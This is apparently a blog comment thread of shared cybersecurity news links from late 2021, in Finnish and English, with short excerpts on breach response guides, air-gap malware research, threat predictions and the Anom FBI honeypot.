Digi- ja väestötietovirasto on julkaissut Suomi.fi-verkkopalveluun sähköisen oppaan tietomurron tai tietovuodon kohteeksi joutuneelle organisaatiolle. Oppaasta yritykset, yhteisöt ja muut organisaatiot saavat tietoa, kuinka toimia, jos epäilevät organisaationsa joutuneen tietomurron uhriksi tai jos organisaation hallussa olevia salassa pidettäviä tietoja on vuotanut julkisuuteen.
Tomi Engdahl says:
Jumping the air gap: 15 years of nationstate effort
https://www.welivesecurity.com/2021/12/01/jumping-air-gap-15-years-nation-state-effort/
Air-gapping is used to protect the most sensitive of networks. In the first half of 2020 alone, four previously unknown malicious frameworks designed to breach air-gapped networks emerged, bringing the total, by our count, to 17. ESET Research decided to revisit each framework known to date and to put them in perspective, side by side. Despite some differences and nuances found across all frameworks studied, our analysis shows how most differ on many of those aspects only from an implementation perspective, mostly due to the severe constraints imposed by air-gapped environments. Armed with this information, we will highlight some detection opportunities specific to the actual techniques observed in the wild.
Tomi Engdahl says:
Australia passes bill allowing it to impose sanctions for cyber-attacks https://therecord.media/australia-passes-bill-allowing-it-to-impose-sanctions-for-cyber-attacks/
The Australian version of the Magnitsky Act, which passed unanimously this week, can also be used to sanction corrupt politicians and human rights abuses but also includes a clause to punish foreign hackers as well.
Tomi Engdahl says:
Encryption Does Not Equal Invisibility Detecting Anomalous TLS Certificates with the Half-Space-Trees Algorithm
https://research.nccgroup.com/2021/12/02/encryption-does-not-equal-invisibility-detecting-anomalous-tls-certificates-with-the-half-space-trees-algorithm/
There is often (meta)data to consider when looking at encrypted traffic which still has operational value. In this blogpost, we describe the research on the characteristics of TLS certificates that we conducted and the incremental machine learning model that we applied to detect the anomalous certificates.
Tomi Engdahl says:
Kauppakamarit ja HVK yhteistyöhön yritysten jatkuvuudenhallinnan vahvistamiseksi https://www.huoltovarmuuskeskus.fi/a/kauppakamarit-ja-hvk-yhteistyohon-yritysten-jatkuvuudenhallinnan-vahvistamiseksi
Jatkuvuudenhallinnan merkitys on auennut monille yrityksille pandemian myötä uudella tavalla. Keskuskauppakamari, kauppakamarit ja HVK painottavat varautumisen merkitystä ja pyrkivät yhdessä luomaan yrityksille keinoja tähän työhön aloittamalla Luotettava jatkuvuus eli Lujat-kehityshankkeen.
Tomi Engdahl says:
Inside Intel’s Secret Warehouse in Costa Rica
https://www.wsj.com/articles/inside-intels-secret-warehouse-in-costa-rica-11638181801?mod=djemalertNEWS
Legacy technology can introduce cybersecurity weaknesses. Tech makers constantly improve their products to take advantage of speed and power increases, but customers don’t always upgrade at the same pace.
Intel’s answer to this conundrum was to create a warehouse and laboratory in Costa Rica, where the company already had a research-and-development lab, to store the breadth of its technology and make the devices available for remote testing.
Inside Intel’s Secret Warehouse in Costa Rica
Chip maker is stockpiling legacy technology for security research, plans to expand facility to house 6,000 pieces of equipment
https://www.wsj.com/articles/inside-intels-secret-warehouse-in-costa-rica-11638181801?mod=djemalertNEWS
Tomi Engdahl says:
Known Exploited Vulnerabilities Catalog
https://www.cisa.gov/known-exploited-vulnerabilities-catalog
Tomi Engdahl says:
Prediction Season: What’s in Store for Cybersecurity in 2022?
https://www.securityweek.com/prediction-season-whats-store-cybersecurity-2022
The past year has been quite challenging and tiring for many IT and security professionals, as threat actors capitalized on the rapidly changing environment created by accelerated digitalization and cloud transformation in response to the COVID-19 pandemic. And while we all hope that the next year is better when it comes to the onslaught of daily phishing, ransomware, and credential stuffing attacks; cyber criminals will likely learn from this year’s successful tactics, retool, and pivot them into next year’s campaigns to wreak even more havoc in all lives.
Today’s dynamic threatscape requires that we adjust to the ever-expanding attack surface. It doesn’t matter where data resides, or who is ultimately trying to access it — humans or machines. What matters most is that we minimize the risk of data exfiltration. Period.
Consider the following threats that are on the horizon in 2022 and start preparing for them now:
Compromised Identities Continue to Fuel the Cyberattack Engine
Ransomware Attacks Evolve to Multifaceted Extortion Schemes
Pay Attention to the Supply Chain Threats
The Work from Anywhere Era Creates New Threats
Conclusion
While it might be overwhelming to look at the four critical threats on the horizon you need to prepare for, focusing on these predictions for 2022 will help you strengthen your security posture and minimize your organization’s risk exposure. In the end, it all comes down to addressing the most imminent threats facing your organization.
Tomi Engdahl says:
The Impact of the Pandemic on Today’s Approach to Cybersecurity
https://www.securityweek.com/impact-pandemic-todays-approach-cybersecurity
Security practitioners must figure out how to enable a secure and resilient anywhere workforce to reduce risk
While digitalization and cloud transformation were already part of most organization’s long-term strategy, the COVID-19 pandemic not only accelerated but permanently transformed the cybersecurity landscape by ushering in a new work from anywhere era.
To support the sudden shift to remote working, many companies had to adopt a “move first, plan later” approach and leave their network-centric security bubble behind that allowed IT teams to own and control most of the network. Ultimately, punching holes in existing security controls in the name of business continuity created vulnerabilities and exposed many organizations to increased risks. Cyber adversaries capitalized on the rapidly changing environment by intensifying their attacks and targeting the weakest link in the attack chain – the remote worker. This led to a 141 percent year-over-year increase in volume of data breached.
As it’s become clear that remote/hybrid work is here to stay, IT security practitioners must figure out how to enable a secure and resilient anywhere workforce to minimize their future risk exposure.
Tomi Engdahl says:
A Peek Inside Anom, the Phone Company Secretly Used in an FBI Honeypot
Videos, documents, and other files obtained by Motherboard show how the company functioned as an entity in its own right.
https://www.vice.com/en/article/n7nnmg/inside-anom-video-operation-trojan-shield-ironside
“We were never told that this project is going to be in the middle of this,” one developer who worked for Anom told Motherboard, referring to the secret that the phones sent their messages to the authorities. Motherboard granted the source anonymity to protect them from retaliation. The developer said Anom management told them that their customers were corporations. “Those are our customers. That’s what we were told,” they said.
Several years ago Anom’s creator, a convicted drug trafficker, offered Anom to the FBI for its own use in investigations during the early stages of the company’s creation, according to court records. Authorities and the creator then introduced the feature to surreptitiously intercept users’ messages. Earlier this year Motherboard obtained one of the Anom devices from the secondary market. As well as hiding the Anom communications platform behind the phone’s calculator app, the device also had a dummy operating system loaded with banal looking apps that could be used to trick a casual observer that the device was just an ordinary phone.
Tomi Engdahl says:
Finding Your Niche in Cybersecurity
With a little patience and research, you can discover a role you love that also protects those around you.
https://www.darkreading.com/careers-and-people/finding-your-niche-in-cybersecurity
Tomi Engdahl says:
‘Confusion’ emerges as new weapon class for Air Force cyber warriors
https://www.c4isrnet.com/electronic-warfare/2021/12/01/confusion-emerges-as-new-weapon-class-for-air-force-cyber-warriors/